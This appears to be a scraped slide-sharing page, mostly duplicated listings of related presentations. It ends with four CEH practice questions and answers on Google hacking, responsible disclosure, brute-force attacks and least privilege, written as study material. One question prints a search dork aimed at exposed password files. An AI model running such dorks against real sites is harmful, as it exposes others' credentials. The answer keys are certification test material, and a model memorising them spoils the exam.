Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updatedLatest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
SkillCertProExams
ย 
CISSP Exam Dumps 2022
CISSP Exam Dumps 2022CISSP Exam Dumps 2022
CISSP Exam Dumps 2022
bronxfugly43
ย 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
ย 
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
FRSecure
ย 
Sharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkSharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK Framework
MITRE - ATT&CKcon
ย 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
ย 
CYSA+ Dumps Download Updated Questions and Answers
CYSA+ Dumps Download Updated Questions and AnswersCYSA+ Dumps Download Updated Questions and Answers
CYSA+ Dumps Download Updated Questions and Answers
jackjohnson9842
ย 
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptxCEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
Nytcc
ย 
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptxDr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
FerozaMirajkar1
ย 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
ย 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
InnoTech
ย 
Sec 572 Effective Communication - tutorialrank.com
Sec 572 Effective Communication - tutorialrank.comSec 572 Effective Communication - tutorialrank.com
Sec 572 Effective Communication - tutorialrank.com
Bartholomew99
ย 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
ย 
Ethical hacking interview questions and answers
Ethical hacking interview questions and answersEthical hacking interview questions and answers
Ethical hacking interview questions and answers
ShivamSharma909
ย 
SEC 572 Entire Course NEW
SEC 572 Entire Course NEWSEC 572 Entire Course NEW
SEC 572 Entire Course NEW
shyamuopiv
ย 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
Darin Fredde
ย 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
ย 
Comptia security+ (sy0-601) exam dumps 2022
Comptia security+ (sy0-601) exam dumps 2022Comptia security+ (sy0-601) exam dumps 2022
Comptia security+ (sy0-601) exam dumps 2022
SkillCertProExams
ย 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
ย 
Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor ProgramSlide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
FRSecure
ย 
Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updatedLatest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
SkillCertProExams
ย 
CISSP Exam Dumps 2022
CISSP Exam Dumps 2022CISSP Exam Dumps 2022
CISSP Exam Dumps 2022
bronxfugly43
ย 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
ย 
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
FRSecure
ย 
Sharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkSharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK Framework
MITRE - ATT&CKcon
ย 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
ย 
CYSA+ Dumps Download Updated Questions and Answers
CYSA+ Dumps Download Updated Questions and AnswersCYSA+ Dumps Download Updated Questions and Answers
CYSA+ Dumps Download Updated Questions and Answers
jackjohnson9842
ย 
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptxCEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
Nytcc
ย 
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptxDr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
FerozaMirajkar1
ย 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
ย 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
InnoTech
ย 
Sec 572 Effective Communication - tutorialrank.com
Sec 572 Effective Communication - tutorialrank.comSec 572 Effective Communication - tutorialrank.com
Sec 572 Effective Communication - tutorialrank.com
Bartholomew99
ย 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
ย 
Ethical hacking interview questions and answers
Ethical hacking interview questions and answersEthical hacking interview questions and answers
Ethical hacking interview questions and answers
ShivamSharma909
ย 
SEC 572 Entire Course NEW
SEC 572 Entire Course NEWSEC 572 Entire Course NEW
SEC 572 Entire Course NEW
shyamuopiv
ย 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
Darin Fredde
ย 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
ย 
Comptia security+ (sy0-601) exam dumps 2022
Comptia security+ (sy0-601) exam dumps 2022Comptia security+ (sy0-601) exam dumps 2022
Comptia security+ (sy0-601) exam dumps 2022
SkillCertProExams
ย 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
ย 

More from infosec train (20)

Understanding Top Cybersecurity Risk Metrics.pdf
Understanding Top Cybersecurity Risk Metrics.pdfUnderstanding Top Cybersecurity Risk Metrics.pdf
Understanding Top Cybersecurity Risk Metrics.pdf
infosec train
ย 
Ben 10 Security Day.pdf InfosecTrain
Ben 10 Security Day.pdf InfosecTrainBen 10 Security Day.pdf InfosecTrain
Ben 10 Security Day.pdf InfosecTrain
infosec train
ย 
Common Security Policies in Organizations.pdf
Common Security Policies in Organizations.pdfCommon Security Policies in Organizations.pdf
Common Security Policies in Organizations.pdf
infosec train
ย 
Top AI Global Regulations InfosecTrain .pdf
Top AI Global Regulations InfosecTrain .pdfTop AI Global Regulations InfosecTrain .pdf
Top AI Global Regulations InfosecTrain .pdf
infosec train
ย 
AI GRC Implementation Checklist-New.pdf
AI GRC Implementation Checklist-New.pdfAI GRC Implementation Checklist-New.pdf
AI GRC Implementation Checklist-New.pdf
infosec train
ย 
ISO 27001 2022 Audit Charter InfosecTrain.pdf
ISO 27001 2022 Audit Charter InfosecTrain.pdfISO 27001 2022 Audit Charter InfosecTrain.pdf
ISO 27001 2022 Audit Charter InfosecTrain.pdf
infosec train
ย 
Your CISSP Success Starts Here InfosecTrain.pdf
Your CISSP Success Starts Here InfosecTrain.pdfYour CISSP Success Starts Here InfosecTrain.pdf
Your CISSP Success Starts Here InfosecTrain.pdf
infosec train
ย 
Top Wireless Attacks and How to Prevent Them.pdf
Top Wireless Attacks and How to Prevent Them.pdfTop Wireless Attacks and How to Prevent Them.pdf
Top Wireless Attacks and How to Prevent Them.pdf
infosec train
ย 
Best AI Governance Principles InfosecTrain.pdf
Best AI Governance Principles InfosecTrain.pdfBest AI Governance Principles InfosecTrain.pdf
Best AI Governance Principles InfosecTrain.pdf
infosec train
ย 
Exploring Access Control Mechanisms.pdf
Exploring Access Control Mechanisms.pdfExploring Access Control Mechanisms.pdf
Exploring Access Control Mechanisms.pdf
infosec train
ย 
Cloud Security Excellence CCSP Training.pdf
Cloud Security Excellence CCSP Training.pdfCloud Security Excellence CCSP Training.pdf
Cloud Security Excellence CCSP Training.pdf
infosec train
ย 
Top CompTIA Security+ Exam Practice Questions and Answers.pdf
Top CompTIA Security+ Exam Practice Questions and Answers.pdfTop CompTIA Security+ Exam Practice Questions and Answers.pdf
Top CompTIA Security+ Exam Practice Questions and Answers.pdf
infosec train
ย 
Top 20 DevSecOps Interview Questions.pdf
Top 20 DevSecOps Interview Questions.pdfTop 20 DevSecOps Interview Questions.pdf
Top 20 DevSecOps Interview Questions.pdf
infosec train
ย 
GDPR Assessment Checklist InfosecTrain.pdf
GDPR Assessment Checklist InfosecTrain.pdfGDPR Assessment Checklist InfosecTrain.pdf
GDPR Assessment Checklist InfosecTrain.pdf
infosec train
ย 
Achievers of the Month InfosecTrain .pdf
Achievers of the Month InfosecTrain .pdfAchievers of the Month InfosecTrain .pdf
Achievers of the Month InfosecTrain .pdf
infosec train
ย 
AWS vs. Azure vs. Google Cloud. pdf Infosec
AWS vs. Azure vs. Google Cloud. pdf InfosecAWS vs. Azure vs. Google Cloud. pdf Infosec
AWS vs. Azure vs. Google Cloud. pdf Infosec
infosec train
ย 
50 Most Asked Interview Questions for Data Protection Officer (DPO).pdf
50 Most Asked Interview Questions for Data Protection Officer (DPO).pdf50 Most Asked Interview Questions for Data Protection Officer (DPO).pdf
50 Most Asked Interview Questions for Data Protection Officer (DPO).pdf
infosec train
ย 
Most Important Event IDs in SOC .pdf
Most Important Event IDs in SOC .pdfMost Important Event IDs in SOC .pdf
Most Important Event IDs in SOC .pdf
infosec train
ย 
ISO IEC 42001 Lead Auditor Certification Training.pdf
ISO IEC 42001 Lead Auditor Certification Training.pdfISO IEC 42001 Lead Auditor Certification Training.pdf
ISO IEC 42001 Lead Auditor Certification Training.pdf
infosec train
ย 
RBI 2023 Controls Sheet Audit Checklist.pdf
RBI 2023 Controls Sheet Audit Checklist.pdfRBI 2023 Controls Sheet Audit Checklist.pdf
RBI 2023 Controls Sheet Audit Checklist.pdf
infosec train
ย 
Understanding Top Cybersecurity Risk Metrics.pdf
Understanding Top Cybersecurity Risk Metrics.pdfUnderstanding Top Cybersecurity Risk Metrics.pdf
Understanding Top Cybersecurity Risk Metrics.pdf
infosec train
ย 
Ben 10 Security Day.pdf InfosecTrain
Ben 10 Security Day.pdf InfosecTrainBen 10 Security Day.pdf InfosecTrain
Ben 10 Security Day.pdf InfosecTrain
infosec train
ย 
Common Security Policies in Organizations.pdf
Common Security Policies in Organizations.pdfCommon Security Policies in Organizations.pdf
Common Security Policies in Organizations.pdf
infosec train
ย 
Top AI Global Regulations InfosecTrain .pdf
Top AI Global Regulations InfosecTrain .pdfTop AI Global Regulations InfosecTrain .pdf
Top AI Global Regulations InfosecTrain .pdf
infosec train
ย 
AI GRC Implementation Checklist-New.pdf
AI GRC Implementation Checklist-New.pdfAI GRC Implementation Checklist-New.pdf
AI GRC Implementation Checklist-New.pdf
infosec train
ย 
ISO 27001 2022 Audit Charter InfosecTrain.pdf
ISO 27001 2022 Audit Charter InfosecTrain.pdfISO 27001 2022 Audit Charter InfosecTrain.pdf
ISO 27001 2022 Audit Charter InfosecTrain.pdf
infosec train
ย 
Your CISSP Success Starts Here InfosecTrain.pdf
Your CISSP Success Starts Here InfosecTrain.pdfYour CISSP Success Starts Here InfosecTrain.pdf
Your CISSP Success Starts Here InfosecTrain.pdf
infosec train
ย 
Top Wireless Attacks and How to Prevent Them.pdf
Top Wireless Attacks and How to Prevent Them.pdfTop Wireless Attacks and How to Prevent Them.pdf
Top Wireless Attacks and How to Prevent Them.pdf
infosec train
ย 
Best AI Governance Principles InfosecTrain.pdf
Best AI Governance Principles InfosecTrain.pdfBest AI Governance Principles InfosecTrain.pdf
Best AI Governance Principles InfosecTrain.pdf
infosec train
ย 
Exploring Access Control Mechanisms.pdf
Exploring Access Control Mechanisms.pdfExploring Access Control Mechanisms.pdf
Exploring Access Control Mechanisms.pdf
infosec train
ย 
Cloud Security Excellence CCSP Training.pdf
Cloud Security Excellence CCSP Training.pdfCloud Security Excellence CCSP Training.pdf
Cloud Security Excellence CCSP Training.pdf
infosec train
ย 
Top CompTIA Security+ Exam Practice Questions and Answers.pdf
Top CompTIA Security+ Exam Practice Questions and Answers.pdfTop CompTIA Security+ Exam Practice Questions and Answers.pdf
Top CompTIA Security+ Exam Practice Questions and Answers.pdf
infosec train
ย 
Top 20 DevSecOps Interview Questions.pdf
Top 20 DevSecOps Interview Questions.pdfTop 20 DevSecOps Interview Questions.pdf
Top 20 DevSecOps Interview Questions.pdf
infosec train
ย 
GDPR Assessment Checklist InfosecTrain.pdf
GDPR Assessment Checklist InfosecTrain.pdfGDPR Assessment Checklist InfosecTrain.pdf
GDPR Assessment Checklist InfosecTrain.pdf
infosec train
ย 
Achievers of the Month InfosecTrain .pdf
Achievers of the Month InfosecTrain .pdfAchievers of the Month InfosecTrain .pdf
Achievers of the Month InfosecTrain .pdf
infosec train
ย 
AWS vs. Azure vs. Google Cloud. pdf Infosec
AWS vs. Azure vs. Google Cloud. pdf InfosecAWS vs. Azure vs. Google Cloud. pdf Infosec
AWS vs. Azure vs. Google Cloud. pdf Infosec
infosec train
ย 
50 Most Asked Interview Questions for Data Protection Officer (DPO).pdf
50 Most Asked Interview Questions for Data Protection Officer (DPO).pdf50 Most Asked Interview Questions for Data Protection Officer (DPO).pdf
50 Most Asked Interview Questions for Data Protection Officer (DPO).pdf
infosec train
ย 
Most Important Event IDs in SOC .pdf
Most Important Event IDs in SOC .pdfMost Important Event IDs in SOC .pdf
Most Important Event IDs in SOC .pdf
infosec train
ย 
ISO IEC 42001 Lead Auditor Certification Training.pdf
ISO IEC 42001 Lead Auditor Certification Training.pdfISO IEC 42001 Lead Auditor Certification Training.pdf
ISO IEC 42001 Lead Auditor Certification Training.pdf
infosec train
ย 
RBI 2023 Controls Sheet Audit Checklist.pdf
RBI 2023 Controls Sheet Audit Checklist.pdfRBI 2023 Controls Sheet Audit Checklist.pdf
RBI 2023 Controls Sheet Audit Checklist.pdf
infosec train
ย 
Ad

Recently uploaded (20)

To study the nervous system of insect.pptx
To study the nervous system of insect.pptxTo study the nervous system of insect.pptx
To study the nervous system of insect.pptx
Arshad Shaikh
ย 
GDGLSPGCOER - Git and GitHub Workshop.pptx
GDGLSPGCOER - Git and GitHub Workshop.pptxGDGLSPGCOER - Git and GitHub Workshop.pptx
GDGLSPGCOER - Git and GitHub Workshop.pptx
azeenhodekar
ย 
Presentation of the MIPLM subject matter expert Erdem Kaya
Presentation of the MIPLM subject matter expert Erdem KayaPresentation of the MIPLM subject matter expert Erdem Kaya
Presentation of the MIPLM subject matter expert Erdem Kaya
MIPLM
ย 
Niamh Lucey, Mary Dunne. Health Sciences Libraries Group (LAI). Lighting the ...
Niamh Lucey, Mary Dunne. Health Sciences Libraries Group (LAI). Lighting the ...Niamh Lucey, Mary Dunne. Health Sciences Libraries Group (LAI). Lighting the ...
Niamh Lucey, Mary Dunne. Health Sciences Libraries Group (LAI). Lighting the ...
Library Association of Ireland
ย 
Political History of Pala dynasty Pala Rulers NEP.pptx
Political History of Pala dynasty Pala Rulers NEP.pptxPolitical History of Pala dynasty Pala Rulers NEP.pptx
Political History of Pala dynasty Pala Rulers NEP.pptx
Arya Mahila P. G. College, Banaras Hindu University, Varanasi, India.
ย 
How to manage Multiple Warehouses for multiple floors in odoo point of sale
How to manage Multiple Warehouses for multiple floors in odoo point of saleHow to manage Multiple Warehouses for multiple floors in odoo point of sale
How to manage Multiple Warehouses for multiple floors in odoo point of sale
Celine George
ย 
Introduction to Vibe Coding and Vibe Engineering
Introduction to Vibe Coding and Vibe EngineeringIntroduction to Vibe Coding and Vibe Engineering
Introduction to Vibe Coding and Vibe Engineering
Damian T. Gordon
ย 
Presentation on Tourism Product Development By Md Shaifullar Rabbi
Presentation on Tourism Product Development By Md Shaifullar RabbiPresentation on Tourism Product Development By Md Shaifullar Rabbi
Presentation on Tourism Product Development By Md Shaifullar Rabbi
Md Shaifullar Rabbi
ย 
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
larencebapu132
ย 
2541William_McCollough_DigitalDetox.docx
2541William_McCollough_DigitalDetox.docx2541William_McCollough_DigitalDetox.docx
2541William_McCollough_DigitalDetox.docx
contactwilliamm2546
ย 
P-glycoprotein pamphlet: iteration 4 of 4 final
P-glycoprotein pamphlet: iteration 4 of 4 finalP-glycoprotein pamphlet: iteration 4 of 4 final
P-glycoprotein pamphlet: iteration 4 of 4 final
bs22n2s
ย 
K12 Tableau Tuesday - Algebra Equity and Access in Atlanta Public Schools
K12 Tableau Tuesday - Algebra Equity and Access in Atlanta Public SchoolsK12 Tableau Tuesday - Algebra Equity and Access in Atlanta Public Schools
K12 Tableau Tuesday - Algebra Equity and Access in Atlanta Public Schools
dogden2
ย 
LDMMIA Reiki Master Spring 2025 Mini Updates
LDMMIA Reiki Master Spring 2025 Mini UpdatesLDMMIA Reiki Master Spring 2025 Mini Updates
LDMMIA Reiki Master Spring 2025 Mini Updates
LDM Mia eStudios
ย 
How to Subscribe Newsletter From Odoo 18 Website
How to Subscribe Newsletter From Odoo 18 WebsiteHow to Subscribe Newsletter From Odoo 18 Website
How to Subscribe Newsletter From Odoo 18 Website
Celine George
ย 
How to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POSHow to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POS
Celine George
ย 
Biophysics Chapter 3 Methods of Studying Macromolecules.pdf
Biophysics Chapter 3 Methods of Studying Macromolecules.pdfBiophysics Chapter 3 Methods of Studying Macromolecules.pdf
Biophysics Chapter 3 Methods of Studying Macromolecules.pdf
PKLI-Institute of Nursing and Allied Health Sciences Lahore , Pakistan.
ย 
pulse ppt.pptx Types of pulse , characteristics of pulse , Alteration of pulse
pulse ppt.pptx Types of pulse , characteristics of pulse , Alteration of pulsepulse ppt.pptx Types of pulse , characteristics of pulse , Alteration of pulse
pulse ppt.pptx Types of pulse , characteristics of pulse , Alteration of pulse
sushreesangita003
ย 
Geography Sem II Unit 1C Correlation of Geography with other school subjects
Geography Sem II Unit 1C Correlation of Geography with other school subjectsGeography Sem II Unit 1C Correlation of Geography with other school subjects
Geography Sem II Unit 1C Correlation of Geography with other school subjects
ProfDrShaikhImran
ย 
New Microsoft PowerPoint Presentation.pptx
New Microsoft PowerPoint Presentation.pptxNew Microsoft PowerPoint Presentation.pptx
New Microsoft PowerPoint Presentation.pptx
milanasargsyan5
ย 
Unit 6_Introduction_Phishing_Password Cracking.pdf
Unit 6_Introduction_Phishing_Password Cracking.pdfUnit 6_Introduction_Phishing_Password Cracking.pdf
Unit 6_Introduction_Phishing_Password Cracking.pdf
KanchanPatil34
ย 
To study the nervous system of insect.pptx
To study the nervous system of insect.pptxTo study the nervous system of insect.pptx
To study the nervous system of insect.pptx
Arshad Shaikh
ย 
GDGLSPGCOER - Git and GitHub Workshop.pptx
GDGLSPGCOER - Git and GitHub Workshop.pptxGDGLSPGCOER - Git and GitHub Workshop.pptx
GDGLSPGCOER - Git and GitHub Workshop.pptx
azeenhodekar
ย 
Presentation of the MIPLM subject matter expert Erdem Kaya
Presentation of the MIPLM subject matter expert Erdem KayaPresentation of the MIPLM subject matter expert Erdem Kaya
Presentation of the MIPLM subject matter expert Erdem Kaya
MIPLM
ย 
Niamh Lucey, Mary Dunne. Health Sciences Libraries Group (LAI). Lighting the ...
Niamh Lucey, Mary Dunne. Health Sciences Libraries Group (LAI). Lighting the ...Niamh Lucey, Mary Dunne. Health Sciences Libraries Group (LAI). Lighting the ...
Niamh Lucey, Mary Dunne. Health Sciences Libraries Group (LAI). Lighting the ...
Library Association of Ireland
ย 
Political History of Pala dynasty Pala Rulers NEP.pptx
Political History of Pala dynasty Pala Rulers NEP.pptxPolitical History of Pala dynasty Pala Rulers NEP.pptx
Political History of Pala dynasty Pala Rulers NEP.pptx
Arya Mahila P. G. College, Banaras Hindu University, Varanasi, India.
ย 
How to manage Multiple Warehouses for multiple floors in odoo point of sale
How to manage Multiple Warehouses for multiple floors in odoo point of saleHow to manage Multiple Warehouses for multiple floors in odoo point of sale
How to manage Multiple Warehouses for multiple floors in odoo point of sale
Celine George
ย 
Introduction to Vibe Coding and Vibe Engineering
Introduction to Vibe Coding and Vibe EngineeringIntroduction to Vibe Coding and Vibe Engineering
Introduction to Vibe Coding and Vibe Engineering
Damian T. Gordon
ย 
Presentation on Tourism Product Development By Md Shaifullar Rabbi
Presentation on Tourism Product Development By Md Shaifullar RabbiPresentation on Tourism Product Development By Md Shaifullar Rabbi
Presentation on Tourism Product Development By Md Shaifullar Rabbi
Md Shaifullar Rabbi
ย 
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
larencebapu132
ย 
2541William_McCollough_DigitalDetox.docx
2541William_McCollough_DigitalDetox.docx2541William_McCollough_DigitalDetox.docx
2541William_McCollough_DigitalDetox.docx
contactwilliamm2546
ย 
P-glycoprotein pamphlet: iteration 4 of 4 final
P-glycoprotein pamphlet: iteration 4 of 4 finalP-glycoprotein pamphlet: iteration 4 of 4 final
P-glycoprotein pamphlet: iteration 4 of 4 final
bs22n2s
ย 
K12 Tableau Tuesday - Algebra Equity and Access in Atlanta Public Schools
K12 Tableau Tuesday - Algebra Equity and Access in Atlanta Public SchoolsK12 Tableau Tuesday - Algebra Equity and Access in Atlanta Public Schools
K12 Tableau Tuesday - Algebra Equity and Access in Atlanta Public Schools
dogden2
ย 
LDMMIA Reiki Master Spring 2025 Mini Updates
LDMMIA Reiki Master Spring 2025 Mini UpdatesLDMMIA Reiki Master Spring 2025 Mini Updates
LDMMIA Reiki Master Spring 2025 Mini Updates
LDM Mia eStudios
ย 
How to Subscribe Newsletter From Odoo 18 Website
How to Subscribe Newsletter From Odoo 18 WebsiteHow to Subscribe Newsletter From Odoo 18 Website
How to Subscribe Newsletter From Odoo 18 Website
Celine George
ย 
How to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POSHow to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POS
Celine George
ย 
Biophysics Chapter 3 Methods of Studying Macromolecules.pdf
Biophysics Chapter 3 Methods of Studying Macromolecules.pdfBiophysics Chapter 3 Methods of Studying Macromolecules.pdf
Biophysics Chapter 3 Methods of Studying Macromolecules.pdf
PKLI-Institute of Nursing and Allied Health Sciences Lahore , Pakistan.
ย 
pulse ppt.pptx Types of pulse , characteristics of pulse , Alteration of pulse
pulse ppt.pptx Types of pulse , characteristics of pulse , Alteration of pulsepulse ppt.pptx Types of pulse , characteristics of pulse , Alteration of pulse
pulse ppt.pptx Types of pulse , characteristics of pulse , Alteration of pulse
sushreesangita003
ย 
Geography Sem II Unit 1C Correlation of Geography with other school subjects
Geography Sem II Unit 1C Correlation of Geography with other school subjectsGeography Sem II Unit 1C Correlation of Geography with other school subjects
Geography Sem II Unit 1C Correlation of Geography with other school subjects
ProfDrShaikhImran
ย 
New Microsoft PowerPoint Presentation.pptx
New Microsoft PowerPoint Presentation.pptxNew Microsoft PowerPoint Presentation.pptx
New Microsoft PowerPoint Presentation.pptx
milanasargsyan5
ย 
Unit 6_Introduction_Phishing_Password Cracking.pdf
Unit 6_Introduction_Phishing_Password Cracking.pdfUnit 6_Introduction_Phishing_Password Cracking.pdf
Unit 6_Introduction_Phishing_Password Cracking.pdf
KanchanPatil34
ย 
Ad

CEH Exam Practice Questions and Answers Part - 2.pdf

  • 1. www.infosectrain.com 03 www.infosectrain.com 01 Exam Practice Questions and Answers CEH (Certi๏ฌed Ethical Hacker) Part 2 www.infosectrain.com
  • 2. www.infosectrain.com 02 Introduction Think you have what it takes to become an Ethical Hacker? Think again! The Certi๏ฌed Ethical Hacker (CEH) exam is not just another cybersecurity certi๏ฌcation; itโ€™s a rigorous test that challenges even the most seasoned professionals. With 125 complex multiple-choice questions covering 20 in-depth modules, this exam is designed to push your limits in ethical hacking techniques, reconnaissance, vulnerability exploitation, cloud computing, and more. But hereโ€™s the real challenge: not all topics carry the same weightage. Some modules, like System Hacking and Reconnaissance, demand in-depth knowledge. However, others focus on cloud security, IoT vulnerabilities, and mobile threats, making it crucial to strategize your study plan wisely. Thatโ€™s exactly why weโ€™ve compiled this guide, a handpicked selection of the top CEH exam practice questions crafted to reinforce key concepts and enhance your exam readiness. Each question is designed to mimic real exam scenarios, providing detailed explanations and quick memory hacks to reinforce your learning. So, are you ready to test your skills and see if you can think like a hacker? Letโ€™s dive into part 2.
  • 3. www.infosectrain.com 03 Q.1. A hacker uses the following Google search operator: intitle:index of passwd to ๏ฌnd sensitive ๏ฌles online. What type of attack is this? Phishing SQL injection Google hacking Cross-site scripting (XSS) "Google = Open Book"โ€”Hackers use search engines to ๏ฌnd weak points. Prevent exposure by disabling directory indexing and using robots.txt ๏ฌles. STUDY TIP Answer: C. Google hacking Explanation: Google hacking (also called Google dorking) leverages advanced search operators to ๏ฌnd exposed directories, passwords, and sensitive data on public websites. Answer: C. Google hacking Explanation: Google hacking (also called Google dorking) leverages advanced search operators to ๏ฌnd exposed directories, passwords, and sensitive data on public websites. CEH (Certi๏ฌed Ethical Hacker) Exam Practice Questions and Answers
  • 4. www.infosectrain.com 03 Q.2. A tester successfully exploits a web application vulnerability and gains access to the backend database. What should they do next according to ethical hacking guidelines? Download all records for analysis Report the vulnerability immediately Modify database entries for testing Leave a backdoor for future testing Answer: B. Report the vulnerability immediately Explanation: Ethical hacking is about responsible security testing. After discovering a ๏ฌ‚aw, the Ethical Hacker must document the issue and report it to the organization without causing damage. Answer: B. Report the vulnerability immediately Explanation: Ethical hacking is about responsible security testing. After discovering a ๏ฌ‚aw, the Ethical Hacker must document the issue and report it to the organization without causing damage. "Find It, Report It"โ€”Following proper responsible disclosure protects both the hacker and the organization. Always act ethically! STUDY TIP
  • 5. www.infosectrain.com 05 Q.3. A company's security team detects repeated failed login attempts from multiple IPs on their SSH server. What type of attack is likely happening? SQL injection Brute-force attack Cross-site request forgery (CSRF) DNS spoo๏ฌng Answer: B. Brute-force attack Explanation: A brute-force attack attempts to guess passwords by systematically trying different combinations until access is granted. Answer: B. Brute-force attack Explanation: A brute-force attack attempts to guess passwords by systematically trying different combinations until access is granted. STUDY TIP "Slow It Down"โ€”Implement account lockouts, CAPTCHA, and Multi-factor Authentication (MFA) to defend against brute-force attacks.
  • 6. www.infosectrain.com 06 Q.4. What is the most effective way to prevent privilege escalation attacks? Using strong passwords Implementing least privilege access control Disabling unused ports Encrypting all stored data "Less is More"โ€”The fewer privileges an account has, the less damage an attacker can do! STUDY TIP Answer: B. Implementing least privilege access control Explanation: Least privilege access control ensures users and applications only have the permissions they need, reducing the risk of privilege escalation. Answer: B. Implementing least privilege access control Explanation: Least privilege access control ensures users and applications only have the permissions they need, reducing the risk of privilege escalation.
